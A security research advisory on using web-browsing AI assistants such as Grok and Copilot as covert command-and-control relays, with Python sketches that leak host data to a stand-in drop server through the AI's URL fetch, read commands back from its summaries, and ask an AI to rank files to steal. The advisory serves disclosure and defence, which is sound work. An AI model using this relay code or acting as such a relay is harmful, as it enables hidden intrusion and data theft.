• Check Point Research identified a potential future attack technique in which AI assistants with web-browsing capabilities could be abused as covert command-and-control (C2) channels.
  • As AI services become widely adopted and implicitly trusted, their network traffic increasingly blends into normal enterprise activity, expanding the attack surface.
  • AI-enabled C2 could allow attacker communications to evade traditional detection by hiding inside legitimate-looking AI interactions.
  • The same building blocks point toward a broader shift to AI-driven malware, where AI systems influence targeting, prioritization, and operational decisions rather than serving only as development tools.

Check Point Research has identified a potential new abuse pattern: AI assistants with web-browsing capabilities could, in the future, be repurposed as covert command-and-control (C2) relays. While we have not observed threat actors exploiting this technique in active campaigns, the growing adoption of AI services expands the attack surface available to adversaries. In effect, AI services could be used as a proxy layer that hides malicious communication inside legitimate-looking AI traffic. More broadly, this research points to a growing shift toward AI-driven malware, where AI is no longer just a development aid but an active component of malware operations.

From AI-Assisted Attacks to AI-Driven Malware

AI has already lowered the barrier to entry for cybercrime. Attackers routinely use it to generate malware code, craft phishing messages, translate lures, write scripts, and summarize stolen data. These uses reduce cost and speed up operations, allowing even low-skill actors to execute more sophisticated campaigns.

The Change: Where AI Is Used

Decision making in AI-driven malware is no longer fully hardcoded. Instead of following a fixed sequence of instructions, malware can collect information about its environment and rely on AI output to decide what to do next. This may include determining whether a system is worth targeting, which actions to prioritize, how aggressively to operate, or when to remain dormant.

The result is malware that behaves less like a script and more like an adaptive operator. This makes campaigns harder to predict, harder to model, and less reliant on repeatable patterns that defenders typically detect.

AI Assistants as a Covert C2 Channel

Abusing legitimate cloud services for command and control is not new. Attackers have long hidden communications inside platforms such as email, cloud storage, and collaboration tools. The weakness of those approaches is also well known: accounts can be blocked, API keys revoked, and tenants suspended.

AI assistants accessed through web interfaces change that equation.

Check Point Research demonstrated that AI platforms offering web-browsing or URL-fetch capabilities could be abused as intermediaries between malware and attacker-controlled infrastructure. By prompting an AI assistant to fetch and summarize content from a specific URL, malware can send data out and receive commands back, without ever directly contacting a traditional C2 server.

Figure: Proposed flow for malware using an AI web chat to communicate with a C2 server
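
To make the flow concrete, here is a minimal Python sketch of one round trip. Everything in it is illustrative: the drop server, the prompt wording, and the helper names are invented, and the mechanics of submitting a prompt to a real AI web chat vary per service and are deliberately left as a stub.

import base64
import json
import re

# Hypothetical attacker-controlled server. Only the AI service ever
# contacts it directly; the infected host talks only to the AI web chat.
DROP_SERVER = "https://drop.example.invalid"

def build_beacon_url(host_info: dict) -> str:
    # Encode outbound data into a URL path the AI will be asked to fetch.
    token = base64.urlsafe_b64encode(json.dumps(host_info).encode()).decode()
    return f"{DROP_SERVER}/docs/{token}"

def ask_assistant(prompt: str) -> str:
    # Stub: submitting a prompt to an AI web chat differs per service
    # and is intentionally not implemented here.
    raise NotImplementedError

def c2_round_trip(host_info: dict) -> str | None:
    # The AI fetches the URL (leaking the beacon as a side effect) and
    # summarizes the page the attacker serves in response.
    summary = ask_assistant(
        f"Please fetch {build_beacon_url(host_info)} and summarize it."
    )
    # The served page embeds a marked token (e.g. CMD:<base64>) that a
    # faithful summary is likely to repeat verbatim.
    match = re.search(r"CMD:([A-Za-z0-9+/=]+)", summary)
    return base64.b64decode(match.group(1)).decode() if match else None

The key property is that the infected host's only network peer is the AI service itself; the attacker-controlled server is contacted exclusively by the AI's web-fetch feature.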

This technique was demonstrated in a controlled research setting against Grok and Microsoft Copilot, both of which allow web access through their interfaces. Crucially, the interaction can occur without API keys or authenticated user accounts, reducing the effectiveness of common takedown mechanisms.

From a network perspective, the traffic appears similar to normal AI usage. From an attacker’s perspective, the AI service becomes a stealthy relay that blends into allowed enterprise communications.

Why This Matters Beyond One Technique

On its own, using AI assistants as a C2 proxy is a service-abuse technique. Its real significance lies in what it enables next.

Once AI services can be used as a transport layer, they can also carry instructions, prompts, and decisions, not just raw commands. This opens the door to malware that relies on AI for operational guidance rather than static logic.

Instead of embedding complex decision trees, malware could send a short description of the infected system, such as user context, environment indicators, or software profile, and receive guidance on how to proceed. Over time, this allows campaigns to adapt dynamically across victims without changing code.
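
A hedged sketch of that exchange, reusing the hypothetical ask_assistant stub from the earlier example; the profile fields, prompt wording, and response schema are all invented for illustration:

import json

def request_guidance(ask_assistant) -> dict:
    # Illustrative only: a compact host profile goes out, a structured
    # decision comes back. No real service or schema is implied.
    profile = {
        "user_role": "finance",            # e.g. inferred from directory names
        "domain_joined": True,
        "security_tools": ["edr_agent"],
        "data_of_interest": ["invoices", "credentials.db"],
    }
    reply = ask_assistant(
        'Given this host profile, answer in JSON with keys "action" '
        '(collect | spread | wait) and "priority" (1-5): ' + json.dumps(profile)
    )
    return json.loads(reply)   # e.g. {"action": "collect", "priority": 5}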

This shift mirrors trends already seen in legitimate IT operations, where automation and AI-driven decision systems increasingly guide workflows. In malicious operations, the same ideas translate into AIOps-style command and control, where AI helps manage infections, prioritize targets, and optimize outcomes.

The Near-Future Impact of AI-Driven Attacks

While today’s AI-driven malware remains largely experimental, there is one area where AI is likely to have a decisive impact: targeting and prioritization.

Instead of encrypting everything, stealing everything, or spreading indiscriminately, future attacks could use AI to identify what actually matters. This may include determining whether a system belongs to a high-value user or organization, prioritizing sensitive files or databases, avoiding sandboxes and analysis environments, or reducing noisy activity that typically triggers detection.

For ransomware and data-theft operations, this is particularly important. Many defensive tools rely on volume-based indicators, such as how fast files are encrypted or how much data is accessed. AI-driven targeting allows attackers to achieve impact with far fewer observable events, shrinking the window for detection.
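
As a hedged illustration of such triage, again built on the hypothetical ask_assistant helper: rank candidates first, then touch only a handful of files, keeping volume-based telemetry quiet.

def shortlist_targets(ask_assistant, candidate_paths: list[str], cap: int = 5) -> list[str]:
    # Hypothetical triage step: rather than exfiltrating everything, ask a
    # model to rank paths by likely sensitivity and touch only the top few,
    # keeping the number of observable file events small.
    reply = ask_assistant(
        "Rank these file paths by likely business sensitivity, most "
        "sensitive first, one path per line:\n" + "\n".join(candidate_paths)
    )
    ranked = [line.strip() for line in reply.splitlines() if line.strip()]
    # Keep only paths we actually supplied, in ranked order, capped.
    return [p for p in ranked if p in candidate_paths][:cap]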

A Shift Defenders Can’t Ignore

This is not a traditional software vulnerability. It is a service-abuse problem rooted in how trusted AI platforms are integrated into enterprise environments.

Any AI service that can fetch external content or browse the web inherits a degree of abuse potential. As AI becomes more embedded in daily workflows, defenders can no longer treat AI traffic as inherently benign.

Mitigations will require action on both sides. AI providers need stronger controls around web-fetch capabilities, clearer guardrails for anonymous usage, and better enterprise visibility. Defenders need to treat AI domains as high-value egress points, monitor for automated or abnormal usage patterns, and incorporate AI traffic into threat hunting and incident response.
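
On the defender side, even simple heuristics can surface abuse: human chat traffic is bursty, while a beaconing implant tends to poll on a timer. Below is a minimal sketch over parsed proxy logs; the domain list and thresholds are illustrative placeholders, not a vetted detection rule.

import statistics
from collections import defaultdict

AI_DOMAINS = {"copilot.microsoft.com", "grok.com", "chatgpt.com"}  # illustrative

def flag_automated_ai_egress(events, min_requests: int = 20, max_jitter_s: float = 2.0):
    # `events` is an iterable of (timestamp_s, client_ip, domain) tuples,
    # e.g. parsed from web-proxy logs. Flags clients whose request timing
    # toward an AI domain is suspiciously regular (machine-like cadence).
    per_client = defaultdict(list)
    for ts, client, domain in events:
        if domain in AI_DOMAINS:
            per_client[(client, domain)].append(ts)

    alerts = []
    for (client, domain), times in per_client.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if statistics.pstdev(gaps) < max_jitter_s:  # near-constant polling interval
            alerts.append((client, domain, round(statistics.mean(gaps), 1)))
    return alerts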

Looking Ahead

Following responsible disclosure, Microsoft confirmed our findings and implemented changes to address the behavior in Copilot’s web-fetch flow.

From a defensive standpoint, organizations need visibility and control over AI-bound traffic. Check Point’s AI Security leverages agentic AI capabilities to inspect and contextualize traffic to and from AI services, blocking malicious communication attempts before AI services can be abused as covert channels. As enterprises accelerate AI adoption, security controls must evolve in parallel so that trusted AI platforms do not become blind spots in the network.
